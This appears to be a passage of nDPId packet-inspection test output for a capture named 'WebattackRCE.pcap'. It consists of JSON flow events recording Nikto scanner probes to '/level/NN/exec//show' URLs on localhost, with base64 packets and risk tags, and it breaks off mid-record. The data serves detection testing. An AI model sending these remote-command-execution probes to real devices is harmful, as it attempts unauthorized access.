+00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_packet_id":1,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277619,"pkt":"AAAAAAAAAAAAAAAACABFAADI5L9AAEAGV25\/AAABfwAAAcYyH5D7t9xCdJSM64AYAED+vAAAAQEICp1m\/pudZv6bR0VUIC9sZXZlbC80MC9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjg3KQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":588,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":588,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277619,"flow_last_seen":1576420277619,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277619,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50738,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/40\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001287)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_packet_id":1,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277622,"pkt":"AAAAAAAAAAAAAAAACABFAADIjX9AAEAGrq5\/AAABfwAAAcY0H5DiALWBzWdeg4AYAED+vAAAAQEICp1m\/p6dZv6eR0VUIC9sZXZlbC80MS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODgpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":589,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":589,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277622,"flow_last_seen":1576420277622,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277622,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50740,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/41\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001288)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_packet_id":1,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277624,"pkt":"AAAAAAAAAAAAAAAACABFAADIagJAAEAG0it\/AAABfwAAAcY2H5Bh+1L\/IgWJKIAYAED+vAAAAQEICp1m\/p+dZv6fR0VUIC9sZXZlbC80Mi9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyODkpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":590,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":590,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277624,"flow_last_seen":1576420277624,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277624,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50742,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/42\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001289)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_packet_id":1,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277625,"pkt":"AAAAAAAAAAAAAAAACABFAADI3axAAEAGXoF\/AAABfwAAAcY4H5AuBeVV4Hsa\/oAYAED+vAAAAQEICp1m\/qGdZv6hR0VUIC9sZXZlbC80My9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTApDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":591,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":591,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277625,"flow_last_seen":1576420277625,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277625,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50744,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/43\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001290)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_packet_id":1,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277627,"pkt":"AAAAAAAAAAAAAAAACABFAADIYLhAAEAG23V\/AAABfwAAAcY6H5DQG1hJOevWU4AYAED+vAAAAQEICp1m\/qOdZv6iR0VUIC9sZXZlbC80NC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTEpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":592,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":592,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277627,"flow_last_seen":1576420277627,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277627,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50746,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/44\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001291)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00679{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_packet_id":1,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277628,"pkt":"AAAAAAAAAAAAAAAACABFAADID1ZAAEAGLNh\/AAABfwAAAcY8H5AV\/jesxRnzeoAYAED+vAAAAQEICp1m\/qSdZv6kR0VUIC9sZXZlbC80NS9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkyKQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":593,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":593,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277628,"flow_last_seen":1576420277628,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277628,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50748,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/45\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001292)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_packet_id":1,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277630,"pkt":"AAAAAAAAAAAAAAAACABFAADI0WBAAEAGas1\/AAABfwAAAcY+H5DCTOmi+t3hCIAYAED+vAAAAQEICp1m\/qWdZv6lR0VUIC9sZXZlbC80Ni9leGVjLy9zaG93IEhUVFAvMS4xDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjkzKQ0KQ29ubmVjdGlvbjogS2VlcC1BbGl2ZQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":594,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":594,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277630,"flow_last_seen":1576420277630,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277630,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50750,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/46\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001293)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_packet_id":1,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277631,"pkt":"AAAAAAAAAAAAAAAACABFAADIlpVAAEAGpZh\/AAABfwAAAcZAH5Cryq5teKvsJoAYAED+vAAAAQEICp1m\/qedZv6nR0VUIC9sZXZlbC80Ny9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENCkNvbm5lY3Rpb246IEtlZXAtQWxpdmUNClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTQpDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":595,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":595,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277631,"flow_last_seen":1576420277631,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277631,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50752,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/47\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001294)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_packet_id":1,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277633,"pkt":"AAAAAAAAAAAAAAAACABFAADIENVAAEAGK1l\/AAABfwAAAcZCH5APvynUeLRgIoAYAED+vAAAAQEICp1m\/qmdZv6oR0VUIC9sZXZlbC80OC9leGVjLy9zaG93IEhUVFAvMS4xDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQpVc2VyLUFnZW50OiBNb3ppbGxhLzUuMDAgKE5pa3RvLzIuMS42KSAoRXZhc2lvbnM6Tm9uZSkgKFRlc3Q6MDAxMjk1KQ0KSG9zdDogMTI3LjAuMC4xDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":596,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":596,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277633,"flow_last_seen":1576420277633,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277633,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50754,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/48\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001295)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_packet_id":1,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277637,"pkt":"AAAAAAAAAAAAAAAACABFAADIJlxAAEAGFdJ\/AAABfwAAAcZEH5CFHB9c3vOX2IAYAED+vAAAAQEICp1m\/q2dZv6tR0VUIC9sZXZlbC80OS9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTYpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":597,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":597,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277637,"flow_last_seen":1576420277637,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277637,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50756,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": {"hostname":"127.0.0.1","url":"127.0.0.1\/level\/49\/exec\/\/show","code":0,"content_type":"","user_agent":"Mozilla\/5.00 (Nikto\/2.1.6) (Evasions:None) (Test:001296)"}} +00586{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00678{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_packet_id":1,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":214,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":214,"pkt_l4_len":180,"thread_ts_msec":1576420277639,"pkt":"AAAAAAAAAAAAAAAACABFAADIZI9AAEAG155\/AAABfwAAAcZGH5DAl12NotXkTIAYAED+vAAAAQEICp1m\/q+dZv6vR0VUIC9sZXZlbC81MC9leGVjLy9zaG93IEhUVFAvMS4xDQpIb3N0OiAxMjcuMC4wLjENClVzZXItQWdlbnQ6IE1vemlsbGEvNS4wMCAoTmlrdG8vMi4xLjYpIChFdmFzaW9uczpOb25lKSAoVGVzdDowMDEyOTcpDQpDb25uZWN0aW9uOiBLZWVwLUFsaXZlDQoNCg=="} +01069{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":598,"source":"WebattackRCE.pcap","alias":"nDPId-test","flow_id":598,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1576420277639,"flow_last_seen":1576420277639,"flow_idle_time":7560000,"flow_min_l4_payload_len":148,"flow_max_l4_payload_len":148,"flow_tot_l4_payload_len":148,"flow_avg_l4_payload_len":148,"midstream":1,"thread_ts_msec":1576420277639,"l3_proto":"ip4","src_ip":"127.0.0.1","dst_ip":"127.0.0.1","src_port":50758,"dst_port":8080,"l4_proto":"tcp","ndpi": {"flow_risk": {"5": {"risk":"Known Protocol on Non Standard Port","severity":"Medium","risk_score": {"total":260,"client":230,"server":30}},"12": {"risk":"HTTP Numeric IP Address","severity":"Low","risk_score": {"total":500,"client":450,"server":50}}},"confidence": {"4":"DPI"},"proto":"HTTP","breed":"Acceptable","category":"Web"},"http": 